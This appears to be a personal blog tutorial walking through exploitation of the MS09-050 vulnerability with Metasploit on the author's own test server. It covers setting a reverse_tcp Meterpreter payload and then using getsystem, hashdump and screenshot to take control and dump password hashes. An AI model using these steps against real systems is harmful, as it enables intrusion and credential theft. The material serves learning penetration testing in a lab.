(Click images to see bigger image.)
I found this little vulnerability while running a Nessus scan and wanted to see what I could do with it. As you see in the screen shot it is a Critical vulnerability called MS09-050
So I started my Metasploit by going to cd /opt/metasploit/apps/pro/msf3 from root
Then type search ms09-050 at the prompt as shown in the screen shot
As you see in the above screen shot you see where the arrow is pointing it says “good”. Cool Right!
Now type “use” as shown, then just copy and past that exploit after
Then you are going to want to see the options available. So type “show options”
Set the ip of the host that you want to exploit as shown above.
Now you want to see what payloads are available. There is a long list of payloads. From what I here the best one is windows/meterpreter/reverse_tcp
Type that command in as shown below, then “show options” to see what options you may have to set and as you see here we can set a listening host. Set your ip and soon the fun begins.
Now just type in “exploit” then “help” or “?” to see a list of all the fun things you can do to exploit this system.
As you can see below my 2 favorite things are “getsystem” and “hashdump”
getsystem takes control of the system
hashdump dumps the hash and you can see who is a user of the system as well as get the passwords
Got the system
Dumped the hash (note the users)
idletime is a fun command to see how long the system has been idle for
and screenshot is fun to see what is going on
Notice where the screenshot has been saved to. I will show you how to view it.
In the top right of your Kali Linux you see Applications and Places
Click on Places then File System
Then follow the path, click the usr folder
then the share folder
then click the metasploit-framwork folder
Then look for the name of the file that the system gave it
And Bada Boom Bada Bing, here is the desktop of this unsuspecting user. (Actually, it was my own little server that I had running for the purpose of this demonstration.)
This stuff is tons of fun to learn and even better to know how to defend against an attack like this one that can wipeout the entire network.